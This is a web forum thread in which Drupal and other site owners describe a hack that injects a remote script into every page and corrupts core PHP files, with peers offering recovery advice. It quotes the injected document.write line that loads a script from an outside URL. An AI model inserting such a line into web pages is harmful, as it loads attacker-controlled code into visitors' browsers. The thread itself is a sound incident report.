Hacked
I think my site has been hacked (while it was 6.13) and upgrading to 6.14 hasn't solved it. (BTW, I neglected it for 3 months and so there were some module security vulnerabilities too).
The first problem is that when pages load they try to run a script from a remote site:
This is a German family-run toy shop; I have no idea what they are trying to do from my site, how they did it, or how I fix it. It did get cleaned up when I upgraded to 6.14 but now it's back.
The other problem, which might or might not be related, is that within a few hours the settings.php file and several files within the includes directory get corrupted with nonsense on the first line. If I replace them with uncorrupted copies, everything is OK for a few hours until it happens again.
Any insights appreciated.
P.S.
The script source is
http://spielwaren-carl-loebner.de/shop/team.php
and my site is www.bloomgroup.com
Same problem
My site has also been hacked. I also run a crm system on the same server, this is also compromised. Some kind of iframe, javascript inject.
Together is better*
javascript
i can;t find any reference to this problem anywhere else, though it's hard to beleive I'm the only person on the planet with the problem, however.... it sems there are many js snippets on my installation that have the following inserted at the end
document.write('script src=http://spielwaren-carl-loebner.de/shop/team.php \/script');
document.write('script src=http://spielwaren-carl-loebner.de/shop/team.php \/script');
(took out the tag brackets so it wouldn't be stripped)
I can reupload them from a clean copy of drupal 6.14, but pretty quickly they are corrupted again.
I am not much of a tekkie and I have no idea how to fix this, but I guess I'll start by changing passwords in case the offending entity is using one of them (guess I could find that out too if I spend long enough investigating)
...
The source of your hack may or may not be Drupal.
So, you need to make sure you have a clean backup of your database and check your files directory. Load up a local copy on your recovery server and change your passwords, etc. DO your modules updates and stuff.
Then you need to go through your server configuration. Frankly it would probably be quicker to nuke the server and rebuild it or reset it through your host.
Avoid using the same passwords.
-Steven Peck
---------
Test site, always start with a test site.
Drupal Best Practices Guide -|- Black Mountain
fixing things
Steven
Thanks for the suggestions, though I am afraid I can't follow all you are saying.
What I have done:
Reuploaded all the Drupal 6.14 files. I know that lots of .js files were corrupted (had the remote site name inserted) and a bunch of php files had apparent nonsense on the first line (or maybe it was code but encrypted). All of this is replaced.
Taken out some unfamiliar php files in the Files directories (called gifimg.php)
Changed the Drupal passwords to new ones that have not been used before; also changed passwords for the site login.
Backed up the database and checked to see if the offending script is in there anywhere - doesn't seem to be
Backed up all the non-Drupal files and checked them for the offending script - not there either
That's it; but there is still a reference to remote php script (at spielwaren-carl-loebner.de) written between the head and the body on every page.
I don't have a recovery server set up (yes, I see your tag line and I have read your best practices, but I haven't done it yet and I am not sure how to (though sounds like a good idea). And I don't know what you mean by going through my server configuration--shared Linux on Lypha in my case. Lypha are pretty helpful, though there's usually about an hour for them to respond to a request.
Any further suggestions appreciated.
Tim Parker
PPS
have just redone the upgrade procedure; that's cleaned it up, so now will see if it remains clean....
Similar hack
Oddly, I don't use drupal, but I too appear to have been hacked with the same script - a regular reader of my website thebeerboy.co.uk alerted me to it, but I've no idea how it happened, or how to prevent it.
similar hack
I have since been hacked in just the same way on another site I own that is hosted on Lypha -- with a script hosted on a German family toy shop site--it's hard to believe they are the culprits.
Anyhow, for both, I changed all the passwords. Lypha told me that my files were writable by anyone and they changed the permissions on the files (don't know if they are right, and anyhow, surely you'd have to log in first?). anyhow, I changed all the passwords, made them strong ones, and all has been fine since.
P.S.
P.S. and of course I re-uploaded clean versions of the pages for the non-Drupal site, and reinstalled Drupal for the other.